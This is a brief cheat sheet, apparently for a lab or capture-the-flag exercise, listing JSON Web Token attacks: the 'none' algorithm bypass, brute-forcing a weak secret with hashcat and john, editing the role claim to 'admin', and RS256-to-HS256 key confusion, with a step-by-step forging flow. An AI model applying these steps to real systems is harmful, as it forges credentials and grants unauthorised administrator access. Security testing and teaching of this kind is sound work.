JWT Vulnerabilities & Exploits
1. Algorithm Confusion (None Algorithm):
Change header to: {"typ":"JWT","alg":"none"}
Remove signature: header.payload.
2. Weak Secret Brute Force:
Secret: weak_secret_key_123
Try common secrets: secret, password, 123456, etc.
3. Modify Payload:
Decode payload, change role from "user" to "admin"
Re-encode and sign with cracked/weak secret
4. Key Confusion Attack:
If RS256 is used, try changing to HS256
Use public key as HMAC secret
Example Attack Flow:
1. Generate token with role="user"
2. Decode the JWT at jwt.io
3. Change payload: "role":"admin"
4. Set algorithm to "none"
5. Remove signature
6. Submit modified token
Tools:
• jwt_tool: python jwt_tool.py <JWT>
• hashcat: hashcat -m 16500 jwt.txt wordlist.txt
• john: john jwt.txt --wordlist=wordlist.txt